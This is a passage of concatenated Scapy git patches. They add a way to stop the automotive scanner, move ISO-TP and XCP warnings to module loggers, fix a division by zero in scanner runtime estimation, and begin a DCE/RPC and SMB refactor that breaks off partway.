a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 0c47129d21e..89319f0cdcf 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -10,6 +10,7 @@ import time from itertools import product +from threading import Event from scapy.compat import Any, Union, List, Optional, \ Dict, Callable, Type, cast @@ -77,6 +78,7 @@ def __init__( self.configuration = AutomotiveTestCaseExecutorConfiguration( test_cases or self.default_test_case_clss, **kwargs) self.validate_test_case_kwargs() + self._stop_scan_event = Event() def __reduce__(self): # type: ignore f, t, d = super(AutomotiveTestCaseExecutor, self).__reduce__() # type: ignore # noqa: E501 @@ -92,6 +94,10 @@ def __reduce__(self): # type: ignore del d["reconnect_handler"] except KeyError: pass + try: + del d["_stop_scan_event"] + except KeyError: + pass return f, t, d @property @@ -194,7 +200,9 @@ def execute_test_case(self, test_case, kill_time=None): log_automotive.debug("Execute test_case %s with args %s", test_case.__class__.__name__, test_case_kwargs) - test_case.execute(self.socket, self.target_state, **test_case_kwargs) + test_case.execute(self.socket, self.target_state, + stop_event=self._stop_scan_event, + **test_case_kwargs) test_case.post_execute( self.socket, self.target_state, self.configuration) @@ -234,6 +242,10 @@ def validate_test_case_kwargs(self): test_case_kwargs = self.configuration[test_case.__class__.__name__] test_case.check_kwargs(test_case_kwargs) + def stop_scan(self): + # type: () -> None + self._stop_scan_event.set() + def progress(self): # type: () -> float progress = [] @@ -254,6 +266,7 @@ def scan(self, timeout=None): :param timeout: Time for execution. :return: None """ + self._stop_scan_event.clear() kill_time = time.time() + (timeout or 0xffffffff) log_automotive.debug("Set kill_time to %s" % time.ctime(kill_time)) while kill_time > time.time(): @@ -264,7 +277,7 @@ def scan(self, timeout=None): self.state_paths, self.configuration.test_cases): log_automotive.info("Scan path %s", p) terminate = kill_time <= time.time() - if terminate: + if terminate or self._stop_scan_event.is_set(): log_automotive.debug( "Execution time exceeded. Terminating scan!") break diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 4dc552701ef..6fc6fb7b31a 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -909,6 +909,7 @@ class UDS_RMBARandomEnumerator(UDS_RMBAEnumeratorABC): _supported_kwargs.update({ 'unittest': (bool, None) }) + del _supported_kwargs["scan_range"] _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ :param bool unittest: Enables smaller search space for unit-test diff --git a/scapy/contrib/automotive/xcp/cto_commands_slave.py b/scapy/contrib/automotive/xcp/cto_commands_slave.py index c0fabe73ec8..20e042d73aa 100644 --- a/scapy/contrib/automotive/xcp/cto_commands_slave.py +++ b/scapy/contrib/automotive/xcp/cto_commands_slave.py @@ -5,9 +5,8 @@ # scapy.contrib.status = skip -from logging import warning - from scapy.config import conf +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.xcp.utils import get_max_cto, get_ag, \ XCPEndiannessField, StrVarLenField from scapy.fields import ByteEnumField, ByteField, ShortField, StrLenField, \ @@ -79,8 +78,8 @@ def post_dissection(self, pkt): conf.contribs["XCP"]["byte_order"] = new_value desc = "Big Endian" if new_value else "Little Endian" - warning("Byte order changed to {0} because of received " - "positive connect packet".format(desc)) + log_automotive.warning("Byte order changed to {0} because of received " + "positive connect packet".format(desc)) if conf.contribs["XCP"]["allow_ag_change"]: conf.contribs["XCP"][ @@ -102,7 +101,7 @@ def get_address_granularity(self): comm_mode_basic.address_granularity_1: return 4 else: - warning( + log_automotive.warning( "Getting address granularity from packet failed:" "both flags are 1") diff --git a/scapy/contrib/automotive/xcp/utils.py b/scapy/contrib/automotive/xcp/utils.py index 5d04ba80a02..0213c28cfe5 100644 --- a/scapy/contrib/automotive/xcp/utils.py +++ b/scapy/contrib/automotive/xcp/utils.py @@ -6,9 +6,9 @@ # scapy.contrib.status = skip import struct -from logging import warning from scapy.config import conf +from scapy.contrib.automotive import log_automotive from scapy.fields import StrLenField from scapy.volatile import RandBin, RandNum @@ -18,7 +18,7 @@ def get_max_cto(): if max_cto: return max_cto - warning("Define conf.contribs['XCP']['MAX_CTO'].") + log_automotive.warning("Define conf.contribs['XCP']['MAX_CTO'].") raise KeyError("conf.contribs['XCP']['MAX_CTO'] not defined") @@ -27,7 +27,7 @@ def get_max_dto(): if max_dto: return max_dto else: - warning("Define conf.contribs['XCP']['MAX_DTO'].") + log_automotive.warning("Define conf.contribs['XCP']['MAX_DTO'].") raise KeyError("conf.contribs['XCP']['MAX_DTO'] not defined") @@ -36,8 +36,9 @@ def get_ag(): if address_granularity and address_granularity in [1, 2, 4]: return address_granularity else: - warning("Define conf.contribs['XCP']['Address_Granularity_Byte']." - "Assign either 1, 2 or 4") + log_automotive.warning( + "Define conf.contribs['XCP']['Address_Granularity_Byte']." + "Assign either 1, 2 or 4") return 1 diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index d1c11ecac6a..e13462bd2a4 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -6,6 +6,8 @@ # scapy.contrib.description = ISO-TP (ISO 15765-2) # scapy.contrib.status = loads +import logging + from scapy.consts import LINUX import scapy.libs.six as six from scapy.config import conf @@ -14,7 +16,7 @@ from scapy.contrib.isotp.isotp_packet import ISOTP, ISOTPHeader, \ ISOTPHeaderEA, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC from scapy.contrib.isotp.isotp_utils import ISOTPSession, \ - ISOTPMessageBuilder, log_isotp + ISOTPMessageBuilder from scapy.contrib.isotp.isotp_soft_socket import ISOTPSoftSocket from scapy.contrib.isotp.isotp_scanner import isotp_scan @@ -25,6 +27,8 @@ USE_CAN_ISOTP_KERNEL_MODULE = False +log_isotp = logging.getLogger("scapy.contrib.isotp") + if six.PY3 and LINUX: try: if conf.contribs['ISOTP']['use-can-isotp-kernel-module']: diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 2000d8b7836..6d7e747c4e3 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -12,9 +12,10 @@ import socket from scapy.compat import Optional, Union, Tuple, Type, cast +from scapy.contrib.isotp import log_isotp from scapy.packet import Packet import scapy.libs.six as six -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception from scapy.supersocket import SuperSocket from scapy.data import SO_TIMESTAMPNS from scapy.config import conf @@ -22,7 +23,6 @@ from scapy.contrib.isotp.isotp_packet import ISOTP from scapy.layers.can import CAN_MTU, CAN_MAX_DLEN - LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore CAN_ISOTP = 6 # ISO 15765-2 Transport Protocol @@ -243,7 +243,7 @@ def __bind_socket(self, sock, iface, sid, did): ctypes.sizeof(addr)) if error < 0: - warning("Couldn't bind socket") + log_isotp.warning("Couldn't bind socket") def __set_option_flags(self, sock, # type: socket.socket @@ -340,7 +340,7 @@ def __init__(self, self.ins = self.can_socket self.outs = self.can_socket if basecls is None: - warning('Provide a basecls ') + log_isotp.warning('Provide a basecls ') self.basecls = basecls def recv_raw(self, x=0xffff): @@ -352,19 +352,19 @@ def recv_raw(self, x=0xffff): try: pkt, _, ts = self._recv_raw(self.ins, x) except BlockingIOError: # noqa: F821 - warning('Captured no data, socket in non-blocking mode.') + log_isotp.warning('Captured no data, socket in non-blocking mode.') return None, None, None except socket.timeout: - warning('Captured no data, socket read timed out.') + log_isotp.warning('Captured no data, socket read timed out.') return None, None, None except OSError as e: # something bad happened (e.g. the interface went down) - warning("Captured no data. %s" % e) + log_isotp.warning("Captured no data. %s" % e) if e.errno == 84: - warning("Maybe a consecutive frame was missed. " - "Increasing `stmin` could solve this problem.") + log_isotp.warning("Maybe a consecutive frame was missed. " + "Increasing `stmin` could solve this problem.") elif e.errno == 110: - warning('Captured no data, socket read timed out.') + log_isotp.warning('Captured no data, socket read timed out.') else: self.close() return None, None, None diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 536cf6e42c2..ec346bb1f49 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -7,6 +7,7 @@ # scapy.contrib.status = library import struct +import logging from scapy.compat import Optional, List, Tuple, Any, Type from scapy.packet import Packet @@ -15,7 +16,9 @@ BitEnumField, ByteField, XByteField, BitFieldLenField, StrField from scapy.compat import chb, orb from scapy.layers.can import CAN -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception + +log_isotp = logging.getLogger("scapy.contrib.isotp") CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier CAN_MTU = 16 @@ -27,7 +30,6 @@ 2: 'consecutive', 3: 'flow_control'} - N_PCI_SF = 0x00 # /* single frame */ N_PCI_FF = 0x10 # /* first frame */ N_PCI_CF = 0x20 # /* consecutive frame */ @@ -159,7 +161,7 @@ def defragment(can_frames, use_extended_addressing=None): dst = can_frames[0].identifier if any(frame.identifier != dst for frame in can_frames): - warning("Not all CAN frames have the same identifier") + log_isotp.warning("Not all CAN frames have the same identifier") parser = ISOTPMessageBuilder(use_extended_addressing) parser.feed(can_frames) @@ -177,8 +179,9 @@ def defragment(can_frames, use_extended_addressing=None): return None if len(results) > 1: - warning("More than one ISOTP frame could be defragmented from the " - "provided CAN frames, only returning the first one.") + log_isotp.warning( + "More than one ISOTP frame could be defragmented from the " + "provided CAN frames, only returning the first one.") return results[0] diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 283f83f4e13..e796fcc6e25 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -180,7 +180,7 @@ def scan(sock, # type: SuperSocket sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, noise_ids, False, pkt), - timeout=sniff_time, store=False) + timeout=sniff_time, store=False, chainCC=True) if not verify_results: return return_values @@ -191,7 +191,7 @@ def scan(sock, # type: SuperSocket sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, noise_ids, False, pkt), - timeout=sniff_time * 10, store=False) + timeout=sniff_time * 10, store=False, chainCC=True) return cleaned_ret_val @@ -236,7 +236,7 @@ def scan_extended(sock, # type: SuperSocket send_multiple_ext(sock, ext_isotp_id, pkt, scan_block_size) sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, noise_ids, True, p), - timeout=sniff_time * 3, store=False) + timeout=sniff_time * 3, store=False, chainCC=True) # sleep to prevent flooding time.sleep(sniff_time) @@ -252,7 +252,7 @@ def scan_extended(sock, # type: SuperSocket return_values, noise_ids, True, pkt), - timeout=sniff_time * 2, store=False) + timeout=sniff_time * 2, store=False, chainCC=True) return return_values @@ -308,9 +308,10 @@ def isotp_scan(sock, # type: SuperSocket dummy_pkt = CAN(identifier=0x123, data=b'\xaa\xbb\xcc\xdd\xee\xff\xaa\xbb') - background_pkts = sock.sniff(timeout=noise_listen_time, - started_callback=lambda: - sock.send(dummy_pkt)) + background_pkts = sock.sniff( + timeout=noise_listen_time, + started_callback=lambda: sock.send(dummy_pkt), + chainCC=True) noise_ids = list(set(pkt.identifier for pkt in background_pkts)) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 812403bd59f..5538698aaa4 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -6,7 +6,7 @@ # scapy.contrib.description = ISO-TP (ISO 15765-2) Soft Socket Library # scapy.contrib.status = library - +import logging import struct import time import traceback @@ -17,11 +17,10 @@ from scapy.compat import Optional, Union, List, Tuple, Any, Type, cast, \ Callable, TYPE_CHECKING -from scapy.contrib.isotp import log_isotp from scapy.packet import Packet from scapy.layers.can import CAN import scapy.libs.six as six -from scapy.error import Scapy_Exception, warning, log_runtime +from scapy.error import Scapy_Exception from scapy.supersocket import SuperSocket from scapy.config import conf from scapy.consts import LINUX @@ -33,6 +32,7 @@ if TYPE_CHECKING: from scapy.contrib.cansocket import CANSocket +log_isotp = logging.getLogger("scapy.contrib.isotp") # Enum states ISOTP_IDLE = 0 @@ -150,7 +150,7 @@ def __init__(self, self.impl = impl self.basecls = basecls if basecls is None: - warning('Provide a basecls ') + log_isotp.warning('Provide a basecls ') def close(self): # type: () -> None @@ -304,13 +304,13 @@ def _wait(cls, handle): # Wait until the next timeout, # or until event.set() gets called in another thread. if to_wait > 0: - log_runtime.debug("TimeoutScheduler Thread going to sleep @ %f " + - "for %fs", now, to_wait) + log_isotp.debug("TimeoutScheduler Thread going to sleep @ %f " + + "for %fs", now, to_wait) interrupted = cls._event.wait(to_wait) new = cls._time() - log_runtime.debug("TimeoutScheduler Thread awake @ %f, slept for" + - " %f, interrupted=%d", new, new - now, - interrupted) + log_isotp.debug("TimeoutScheduler Thread awake @ %f, slept for" + + " %f, interrupted=%d", new, new - now, + interrupted) # Clear the event so that we can wait on it again, # Must be done before doing the callbacks to avoid losing a set(). @@ -323,7 +323,7 @@ def _task(cls): start when the first timeout is added and stop when the last timeout is removed or executed.""" - log_runtime.debug("TimeoutScheduler Thread spawning @ %f", cls._time()) + log_isotp.debug("TimeoutScheduler Thread spawning @ %f", cls._time()) time_empty = None @@ -345,7 +345,7 @@ def _task(cls): finally: # Worst case scenario: if this thread dies, the next scheduled # timeout will start a new one - log_runtime.debug("TimeoutScheduler Thread died @ %f", cls._time()) + log_isotp.debug("TimeoutScheduler Thread died @ %f", cls._time()) cls._thread = None @classmethod @@ -580,8 +580,8 @@ def on_can_recv(self, p): # type: (Packet) -> None if p.identifier != self.rx_id: if not self.filter_warning_emitted and conf.verb >= 2: - warning("You should put a filter for identifier=%x on your " - "CAN socket", self.rx_id) + log_isotp.warning("You should put a filter for identifier=%x on your " + "CAN socket", self.rx_id) self.filter_warning_emitted = True else: self.on_recv(p) @@ -590,14 +590,14 @@ def close(self): # type: () -> None try: if select_objects([self.tx_queue], 0): - warning("TX queue not empty") + log_isotp.warning("TX queue not empty") time.sleep(0.1) except OSError: pass try: if select_objects([self.rx_queue], 0): - warning("RX queue not empty") + log_isotp.warning("RX queue not empty") except OSError: pass @@ -621,7 +621,7 @@ def _rx_timer_handler(self): # reset rx state self.rx_state = ISOTP_IDLE if conf.verb > 2: - warning("RX state was reset due to timeout") + log_isotp.warning("RX state was reset due to timeout") def _tx_timer_handler(self): # type: () -> None @@ -634,7 +634,7 @@ def _tx_timer_handler(self): # we did not get any flow control frame in time # reset tx state self.tx_state = ISOTP_IDLE - warning("TX state was reset due to timeout") + log_isotp.warning("TX state was reset due to timeout") return elif self.tx_state == ISOTP_SENDING: # push out the next segmented pdu @@ -642,7 +642,7 @@ def _tx_timer_handler(self): max_bytes = 7 - src_off if self.tx_buf is None: self.tx_state = ISOTP_IDLE - warning("TX buffer is not filled") + log_isotp.warning("TX buffer is not filled") return while 1: load = self.ea_hdr @@ -706,7 +706,7 @@ def on_recv(self, cf): def _recv_fc(self, data): # type: (bytes) -> None """Process a received 'Flow Control' frame""" - log_runtime.debug("Processing FC") + log_isotp.debug("Processing FC") if (self.tx_state != ISOTP_WAIT_FC and self.tx_state != ISOTP_WAIT_FIRST_FC): @@ -718,7 +718,7 @@ def _recv_fc(self, data): if len(data) < 3: self.tx_state = ISOTP_IDLE - warning("CF frame discarded because it was too short") + log_isotp.warning("CF frame discarded because it was too short") return # get communication parameters only from the first FC frame @@ -756,17 +756,17 @@ def _recv_fc(self, data): elif isotp_fc == ISOTP_FC_OVFLW: # overflow in receiver side self.tx_state = ISOTP_IDLE - warning("Overflow happened at the receiver side") + log_isotp.warning("Overflow happened at the receiver side") return else: self.tx_state = ISOTP_IDLE - warning("Unknown FC frame type") + log_isotp.warning("Unknown FC frame type") return def _recv_sf(self, data, ts): # type: (bytes, Union[float, EDecimal]) -> None """Process a received 'Single Frame' frame""" - log_runtime.debug("Processing SF") + log_isotp.debug("Processing SF") if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() @@ -774,7 +774,8 @@ def _recv_sf(self, data, ts): if self.rx_state != ISOTP_IDLE: if conf.verb > 2: - warning("RX state was reset because single frame was received") + log_isotp.warning("RX state was reset because " + "single frame was received") self.rx_state = ISOTP_IDLE length = six.indexbytes(data, 0) & 0xf @@ -787,7 +788,7 @@ def _recv_sf(self, data, ts): def _recv_ff(self, data, ts): # type: (bytes, Union[float, EDecimal]) -> None """Process a received 'First Frame' frame""" - log_runtime.debug("Processing FF") + log_isotp.debug("Processing FF") if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() @@ -795,7 +796,7 @@ def _recv_ff(self, data, ts): if self.rx_state != ISOTP_IDLE: if conf.verb > 2: - warning("RX state was reset because first frame was received") + log_isotp.warning("RX state was reset because first frame was received") self.rx_state = ISOTP_IDLE if len(data) < 7: @@ -841,7 +842,7 @@ def _recv_ff(self, data, ts): def _recv_cf(self, data): # type: (bytes) -> None """Process a received 'Consecutive Frame' frame""" - log_runtime.debug("Processing CF") + log_isotp.debug("Processing CF") if self.rx_state != ISOTP_WAIT_DATA: return @@ -859,20 +860,20 @@ def _recv_cf(self, data): # this is only allowed for the last CF if self.rx_len - self.rx_idx > self.rx_ll_dl: if conf.verb > 2: - warning("Received a CF with insufficient length") + log_isotp.warning("Received a CF with insufficient length") return if six.indexbytes(data, 0) & 0x0f != self.rx_sn: # Wrong sequence number if conf.verb > 2: - warning("RX state was reset because wrong sequence number was " - "received") + log_isotp.warning("RX state was reset because wrong sequence " + "number was received") self.rx_state = ISOTP_IDLE return if self.rx_buf is None: if conf.verb > 2: - warning("rx_buf not filled with data!") + log_isotp.warning("rx_buf not filled with data!") self.rx_state = ISOTP_IDLE return @@ -902,7 +903,7 @@ def _recv_cf(self, data): self.can_send(load) # wait for another CF - log_runtime.debug("Wait for another CF") + log_isotp.debug("Wait for another CF") self.rx_timeout_handle = TimeoutScheduler.schedule( self.cf_timeout, self._rx_timer_handler) @@ -910,13 +911,13 @@ def begin_send(self, x): # type: (bytes) -> None """Begins sending an ISOTP message. This method does not block.""" if self.tx_state != ISOTP_IDLE: - warning("Socket is already sending, retry later") + log_isotp.warning("Socket is already sending, retry later") return self.tx_state = ISOTP_SENDING length = len(x) if length > ISOTP_MAX_DLEN_2015: - warning("Too much data for ISOTP message") + log_isotp.warning("Too much data for ISOTP message") if len(self.ea_hdr) + length <= 7: # send a single frame diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 3a2855e5f19..a4ff91e759d 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -6,6 +6,9 @@ = Imports import itertools +import logging +import threading +import time from scapy.contrib.isotp import ISOTPMessageBuilder from test.testsocket import TestSocket, cleanup_testsockets, open_test_sockets @@ -23,6 +26,8 @@ from scapy.contrib.automotive.gm.gmlan_scanner import * from scapy.contrib.automotive.ecu import * load_layer("can") +log_automotive.setLevel(logging.DEBUG) + = Define Testfunction @@ -34,21 +39,26 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg def reset(): answering_machine.reset_state() sniff(timeout=0.001, opened_socket=[ecu, tester]) - def answering_machine_thread(): - answering_machine(timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") - sim = threading.Thread(target=answering_machine_thread) + sim = threading.Thread(target=answering_machine, kwargs={ + "timeout": 30, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: scanner = GMLAN_Scanner( tester, reset_handler=reset, test_cases=enumerators, timeout=0.2, retry_if_none_received=True, unittest=True, **kwargs) - for i in range(12): - print("Starting scan") - scanner.scan(timeout=10) - if scanner.scan_completed: - print("Scan completed after %d iterations" % i) - break + def scanner_thread(): + for i in range(3): + print("Starting scan") + scanner.scan(timeout=10) + if scanner.scan_completed: + print("Scan completed after %d iterations" % i) + return + scanner_t = threading.Thread(target=scanner_thread) + scanner_t.start() + scanner_t.join(timeout=120) + if scanner_t.is_alive(): + scanner.stop_scan() finally: tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 655f2a903a5..fb333685041 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -25,6 +25,7 @@ except ImportError: log_stream = StringIO() handler = logging.StreamHandler(log_stream) log_runtime.addHandler(handler) +log_isotp.addHandler(handler) = Definition of utility functions From e969c0a850aa43b38447a844cc5715000c035cd0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 16 Aug 2022 11:55:14 +0200 Subject: [PATCH 0866/1632] Fix division by zero bug in automotive scanners --- scapy/contrib/automotive/scanner/enumerator.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 114bf641c98..c9ff95c7c74 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -251,7 +251,8 @@ def runtime_estimation(self): if self._requests_per_state_estimated is None: return None - pkts_tbs = len(self.scanned_states) * self._requests_per_state_estimated + pkts_tbs = max( + len(self.scanned_states) * self._requests_per_state_estimated, 1) pkts_snt = len(self.results) return pkts_tbs, pkts_snt, float(pkts_snt) / pkts_tbs From ca10c5cf00425d0178998ec0b006cbb65ddbfb54 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 17 Aug 2022 12:33:46 -0700 Subject: [PATCH 0867/1632] [MS-RPCE] and [MS-SMB] major update (#3683) * Various fixes regarding DCE/RPC build * DCE/RPC sessions * Cleanup unused code * Add missing GSS_WRAP algo names * Add find_dcerpc_interface * Split SMB client and server * Missing StrFixedLenFieldUtf16 * Remove unfinished smbserver feature * Friendlier getter for SMB2 * DceRpcNak * Improve NDR parsing (a lot) * Minor SMB2 improvements * BIG NDR refactor + Dissect pointer deferal * Build with pointer deferral * Small build bugs * SMB2 logoff, fix rawToken in SMB standalone * Add security providers from MS-RPCE to DCERPC * Cleanup ptr_pack of NDRPacketListField * Clearer exception in find_dcerpc_interface * Add minor_version attribute * Fix computation of auth_pad in sec_trailer * Fix a WTF bug * Compute length for NDR arrays * Pass enum to EnumField * Match union attributes from response with request * Improve SMB server * Small bug in pointer deferal dissection * Add user-friendly utils * Add a few NDR tests * More user-friendly improvements * Bug: parent not copied in clone_with * Build: propagate NDR64 and bug fix * Default close response parameters * Fix Python 2.7 * Fix SMB2_Create_Context offset * Fix SMB2 create context * SMB2: support chain, improvements * Fix ioctl error * SMB: check computeNTProofStr * Fix UTCField default * Improve FileId capabilities * SMB2: contexts * Typos * Minor NDRUnion fixes * Py2 fixes --- doc/scapy/usage.rst | 4 +- scapy/automaton.py | 6 + scapy/config.py | 3 + scapy/contrib/pnio_rpc.py | 4 +- scapy/contrib/rtps/common_types.py | 44 +- scapy/fields.py | 44 +- scapy/layers/dcerpc.py | 1296 ++++++++++++++++++++++++---- scapy/layers/http.py | 2 +- scapy/layers/kerberos.py | 16 +- scapy/layers/ntlm.py | 330 ++++--- scapy/layers/smb.py | 976 +-------------------- scapy/layers/smb2.py | 758 +++++++++++++--- scapy/layers/smbclient.py | 414 +++++++++ scapy/layers/smbserver.py | 498 +++++++++++ scapy/layers/tls/session.py | 5 +- scapy/packet.py | 2 + scapy/sessions.py | 52 +- test/contrib/pnio_rpc.uts | 10 +- test/scapy/layers/dcerpc.uts | 244 +++++- test/scapy/layers/smb2.uts | 17 +- 20 files changed, 3269 insertions(+), 1456 deletions(-) create mode 100644 scapy/layers/smbclient.py create mode 100644 scapy/layers/smbserver.py diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 91c64efa607..b0c907ca20f 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -807,7 +807,7 @@ Those sessions can be used using the ``session=`` parameter of ``sniff()``. Exam How to use TCPSession to defragment TCP packets ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ -The layer on which the decompression is applied must be immediately following the TCP layer. You need to implement a class function called ``tcp_reassemble`` that accepts the binary data and a metada dictionary as argument and returns, when full, a packet. Let's study the (pseudo) example of TLS: +The layer on which the decompression is applied must be immediately following the TCP layer. You need to implement a class function called ``tcp_reassemble`` that accepts the binary data, a metadata dictionary as argument and returns, when full, a packet. Let's study the (pseudo) example of TLS: .. code:: @@ -815,7 +815,7 @@ The layer on which the decompression is applied must be immediately following th [...] @classmethod - def tcp_reassemble(cls, data, metadata): + def tcp_reassemble(cls, data, metadata, session): length = struct.unpack("!H", data[3:5])[0] + 5 if len(data) == length: return TLS(data) diff --git a/scapy/automaton.py b/scapy/automaton.py index 7bdf878726c..2e3dac5f3af 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -209,6 +209,12 @@ def read(self, n=0): # type: (Optional[int]) -> Optional[_T] return self.recv(n) + def clear(self): + # type: () -> None + if not self.closed: + while not self.empty(): + self.recv() + def close(self): # type: () -> None if not self.closed: diff --git a/scapy/config.py b/scapy/config.py index 0833ac3a914..c7916da2aa8 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -827,6 +827,7 @@ class Conf(ConfClass): load_layers = [ 'bluetooth', 'bluetooth4LE', + 'dcerpc', 'dhcp', 'dhcp6', 'dns', @@ -863,6 +864,8 @@ class Conf(ConfClass): 'skinny', 'smb', 'smb2', + 'smbclient', + 'smbserver', 'snmp', 'tftp', 'vrrp', diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 16862298ac4..1a5c97688de 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -605,7 +605,7 @@ class PadFieldWithLen(PadField): def i2len(self, pkt, val): """get the length of the field, including the padding length""" fld_len = self.fld.i2len(pkt, val) - return fld_len + self.padlen(fld_len) + return fld_len + self.padlen(fld_len, pkt) class IODWriteMultipleReq(Block): @@ -642,7 +642,7 @@ def post_build(self, p, pay): fld, val = self.getfield_and_val("blocks") if fld.i2count(self, val) > 0: length = len(val[-1]) - pad = fld.field.padlen(length) + pad = fld.field.padlen(length, self) if pad > 0: p = p[:-pad] # also reduce the recordDataLength accordingly diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index c1a9424f741..adf8cf8b30f 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -12,9 +12,9 @@ # scapy.contrib.status = library import struct -import warnings from scapy.fields import ( + _FieldContainer, BitField, ConditionalField, EnumField, @@ -54,7 +54,7 @@ def e_flags(pkt): return FORMAT_BE -class EField(object): +class EField(_FieldContainer): """ A field that manages endianness of a nested field passed to the constructor """ @@ -72,14 +72,6 @@ def set_endianness(self, pkt): elif self.endianness_from is not None: self.endianness = self.endianness_from(pkt) - if hasattr(self.fld, "set_endianness"): - self.fld.set_endianness(endianness=self.endianness) - return - - if hasattr(self.fld, "endianness"): - self.fld.endianness = self.endianness - return - if isinstance(self.endianness, str) and self.endianness: if isinstance(self.fld, UUIDField): self.fld.uuid_fmt = (UUIDField.FORMAT_LE if @@ -101,12 +93,6 @@ def addfield(self, pkt, buf, val): self.set_endianness(pkt) return self.fld.addfield(pkt, buf, val) - def randval(self): - return self.fld.randval() - - def __getattr__(self, attr): - return getattr(self.fld, attr) - class EPacket(Packet): """A packet that manages its endianness""" @@ -117,6 +103,11 @@ def __init__(self, *args, **kwargs): self.endianness = kwargs.pop("endianness", None) super(EPacket, self).__init__(*args, **kwargs) + def clone_with(self, *args, **kwargs): + pkt = super(EPacket, self).clone_with(*args, **kwargs) + pkt.endianness = self.endianness + return pkt + def extract_padding(self, p): return b"", p @@ -134,23 +125,25 @@ def __init__(self, *args, **kwargs): def set_endianness(self, pkt): if getattr(pkt, "endianness", None) is not None: self.endianness = pkt.endianness - elif self.endianness_from is not None and pkt: + elif self.endianness_from is not None: self.endianness = self.endianness_from(pkt) - if self.endianness is None: - warnings.warn( - 'Endianess should never be None.' - 'Setting it to default: {}', DEFAULT_ENDIANESS) - self.endianness = DEFAULT_ENDIANESS def m2i(self, pkt, m): - return self.cls(m, endianness=pkt.endianness) + self.set_endianness(pkt) + return self.cls(m, endianness=self.endianness) + + def i2m(self, pkt, m): + if m: + self.set_endianness(pkt) + m.endianness = self.endianness + return super(_EPacketField, self).i2m(pkt, m) class EPacketField(_EPacketField, PacketField): """ A PacketField that manages its endianness and that of its nested packet """ - __slots__ = ["endianness", "endianness_from", "fuzz_fun"] + __slots__ = ["endianness", "endianness_from"] class EPacketListField(_EPacketField, PacketListField): @@ -158,7 +151,7 @@ class EPacketListField(_EPacketField, PacketListField): A PacketListField that manages its endianness and that of its nested packet """ - __slots__ = ["endianness", "endianness_from", "fuzz_fun"] + __slots__ = ["endianness", "endianness_from"] class SerializedDataField(StrLenField): @@ -168,7 +161,6 @@ class SerializedDataField(StrLenField): class DataPacketField(EPacketField): def m2i(self, pkt, m): self.set_endianness(pkt) - pl_len = pkt.octetsToNextHeader - 24 _pkt = self.cls( m, diff --git a/scapy/fields.py b/scapy/fields.py index 34ca52966f1..e0e18a62516 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -454,7 +454,8 @@ def __init__(self, self.name = self.dflt.name if any(x[0].name != self.name for x in self.flds): 